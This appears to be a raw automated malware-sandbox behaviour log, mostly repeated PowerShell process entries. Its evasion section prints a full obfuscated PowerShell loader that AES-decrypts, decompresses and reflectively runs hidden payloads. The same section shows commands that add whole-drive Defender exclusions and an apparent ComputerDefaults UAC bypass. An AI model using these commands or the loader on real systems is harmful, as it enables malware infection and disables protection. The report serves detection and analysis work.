Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5736Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4145Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4936Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1339Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6350Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3318Jump to behavior
Source: C:\Windows \System32\ComputerDefaults.exeAPI coverage: 5.7 %
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5900Thread sleep time: -10145709240540247s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6524Thread sleep count: 4936 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2256Thread sleep count: 1339 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6364Thread sleep time: -3689348814741908s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6904Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4412Thread sleep time: -5534023222112862s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exe TID: 2160Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exe TID: 7272Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_BaseBoard
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_BIOS
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: svchost.exe, 0000000F.00000002.3543566601.000002494CA54000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.3542958581.000002494742B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows \System32\ComputerDefaults.exeCode function: 10_2_00007FF64D6024A4 GetCurrentThreadId,IsDebuggerPresent,OutputDebugStringW,10_2_00007FF64D6024A4
Source: C:\Windows \System32\ComputerDefaults.exeCode function: 10_2_00007FF64D608A64 GetCurrentProcessId,CreateMutexExW,WaitForSingleObjectEx,GetProcessHeap,HeapAlloc,GetProcessHeap,GetProcessHeap,HeapFree,memset,InitializeCriticalSectionEx,10_2_00007FF64D608A64
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows \System32\ComputerDefaults.exeCode function: 10_2_00007FF64D60A0A4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,10_2_00007FF64D60A0A4
Source: C:\Windows \System32\ComputerDefaults.exeCode function: 10_2_00007FF64D60A360 SetUnhandledExceptionFilter,10_2_00007FF64D60A360

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\')
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\')Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo cls;powershell -w hidden;function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::FromBase64String('t/6WxGFiWqzOYDiMeQW3vewy5Lst4QLmvh7FIz66oK8='); $aes_var.IV=[System.Convert]::FromBase64String('1xTnhp7Ji3XlXldEQfx/mg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ IEX '$bNhXj=New-Object System.IO.M*em*or*yS*tr*ea*m(,$param_var);'.Replace('*', ''); IEX '$FyATo=New-Object System.IO.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); IEX '$ElTgO=New-Object System.IO.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($bNhXj, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $ElTgO.CopyTo($FyATo); $ElTgO.Dispose(); $bNhXj.Dispose(); $FyATo.Dispose(); $FyATo.ToArray();}function execute_function($param_var,$param2_var){ IEX '$dVsPd=[System.R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$param_var);'.Replace('*', ''); IEX '$DUzhZ=$dVsPd.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); IEX '$DUzhZ.*I*n*v*o*k*e*($null, $param2_var);'.Replace('*', '');}$EYouL = 'C:\Users\user\Desktop\SC.cmd';$host.UI.RawUI.WindowTitle = $EYouL;$tjLTM=[System.IO.File]::ReadAllText($EYouL).Split([Environment]::NewLine);foreach ($xbxfP in $tjLTM) { if ($xbxfP.StartsWith('DzoRhmGmBqXlnTxyAcGU')) { $murOL=$xbxfP.Substring(20); break; }}$payloads_var=[string[]]$murOL.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));$payload3_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[2].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var $null;execute_function $payload3_var (,[string[]] ('')); "Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hiddenJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hiddenJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\')Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c "C:\Windows \System32\ComputerDefaults.exe"Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c rmdir "c:\Windows \"/s /qJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows \System32\ComputerDefaults.exe "C:\Windows \System32\ComputerDefaults.exe"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /s /d /c" echo cls;powershell -w hidden;function decrypt_function($param_var){ $aes_var=[system.security.cryptography.aes]::create(); $aes_var.mode=[system.security.cryptography.ciphermode]::cbc; $aes_var.padding=[system.security.cryptography.paddingmode]::pkcs7; $aes_var.key=[system.convert]::frombase64string('t/6wxgfiwqzoydimeqw3vewy5lst4qlmvh7fiz66ok8='); $aes_var.iv=[system.convert]::frombase64string('1xtnhp7ji3xlxldeqfx/mg=='); $decryptor_var=$aes_var.createdecryptor(); $return_var=$decryptor_var.transformfinalblock($param_var, 0, $param_var.length); $decryptor_var.dispose(); $aes_var.dispose(); $return_var;}function decompress_function($param_var){ iex '$bnhxj=new-object system.io.m*em*or*ys*tr*ea*m(,$param_var);'.replace('*', ''); iex '$fyato=new-object system.io.*m*e*m*o*r*y*s*t*r*e*a*m*;'.replace('*', ''); iex '$eltgo=new-object system.io.c*om*pr*e*ss*io*n.*gz*ip*st*re*am*($bnhxj, [io.c*om*pr*es*si*on*.co*mp*re*ss*i*o*n*mode]::d*e*c*omp*re*ss);'.replace('*', ''); $eltgo.copyto($fyato); $eltgo.dispose(); $bnhxj.dispose(); $fyato.dispose(); $fyato.toarray();}function execute_function($param_var,$param2_var){ iex '$dvspd=[system.r*e*fl*ect*io*n.*as*se*mb*l*y*]::l*o*a*d*([byte[]]$param_var);'.replace('*', ''); iex '$duzhz=$dvspd.*e*n*t*r*y*p*o*i*n*t*;'.replace('*', ''); iex '$duzhz.*i*n*v*o*k*e*($null, $param2_var);'.replace('*', '');}$eyoul = 'c:\users\user\desktop\sc.cmd';$host.ui.rawui.windowtitle = $eyoul;$tjltm=[system.io.file]::readalltext($eyoul).split([environment]::newline);foreach ($xbxfp in $tjltm) { if ($xbxfp.startswith('dzorhmgmbqxlntxyacgu')) { $murol=$xbxfp.substring(20); break; }}$payloads_var=[string[]]$murol.split('\');$payload1_var=decompress_function (decrypt_function ([convert]::frombase64string($payloads_var[0].replace('#', '/').replace('@', 'a'))));$payload2_var=decompress_function (decrypt_function ([convert]::frombase64string($payloads_var[1].replace('#', '/').replace('@', 'a'))));$payload3_var=decompress_function (decrypt_function ([convert]::frombase64string($payloads_var[2].replace('#', '/').replace('@', 'a'))));execute_function $payload1_var $null;execute_function $payload2_var $null;execute_function $payload3_var (,[string[]] ('')); "
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /s /d /c" echo cls;powershell -w hidden;function decrypt_function($param_var){ $aes_var=[system.security.cryptography.aes]::create(); $aes_var.mode=[system.security.cryptography.ciphermode]::cbc; $aes_var.padding=[system.security.cryptography.paddingmode]::pkcs7; $aes_var.key=[system.convert]::frombase64string('t/6wxgfiwqzoydimeqw3vewy5lst4qlmvh7fiz66ok8='); $aes_var.iv=[system.convert]::frombase64string('1xtnhp7ji3xlxldeqfx/mg=='); $decryptor_var=$aes_var.createdecryptor(); $return_var=$decryptor_var.transformfinalblock($param_var, 0, $param_var.length); $decryptor_var.dispose(); $aes_var.dispose(); $return_var;}function decompress_function($param_var){ iex '$bnhxj=new-object system.io.m*em*or*ys*tr*ea*m(,$param_var);'.replace('*', ''); iex '$fyato=new-object system.io.*m*e*m*o*r*y*s*t*r*e*a*m*;'.replace('*', ''); iex '$eltgo=new-object system.io.c*om*pr*e*ss*io*n.*gz*ip*st*re*am*($bnhxj, [io.c*om*pr*es*si*on*.co*mp*re*ss*i*o*n*mode]::d*e*c*omp*re*ss);'.replace('*', ''); $eltgo.copyto($fyato); $eltgo.dispose(); $bnhxj.dispose(); $fyato.dispose(); $fyato.toarray();}function execute_function($param_var,$param2_var){ iex '$dvspd=[system.r*e*fl*ect*io*n.*as*se*mb*l*y*]::l*o*a*d*([byte[]]$param_var);'.replace('*', ''); iex '$duzhz=$dvspd.*e*n*t*r*y*p*o*i*n*t*;'.replace('*', ''); iex '$duzhz.*i*n*v*o*k*e*($null, $param2_var);'.replace('*', '');}$eyoul = 'c:\users\user\desktop\sc.cmd';$host.ui.rawui.windowtitle = $eyoul;$tjltm=[system.io.file]::readalltext($eyoul).split([environment]::newline);foreach ($xbxfp in $tjltm) { if ($xbxfp.startswith('dzorhmgmbqxlntxyacgu')) { $murol=$xbxfp.substring(20); break; }}$payloads_var=[string[]]$murol.split('\');$payload1_var=decompress_function (decrypt_function ([convert]::frombase64string($payloads_var[0].replace('#', '/').replace('@', 'a'))));$payload2_var=decompress_function (decrypt_function ([convert]::frombase64string($payloads_var[1].replace('#', '/').replace('@', 'a'))));$payload3_var=decompress_function (decrypt_function ([convert]::frombase64string($payloads_var[2].replace('#', '/').replace('@', 'a'))));execute_function $payload1_var $null;execute_function $payload2_var $null;execute_function $payload3_var (,[string[]] ('')); "Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
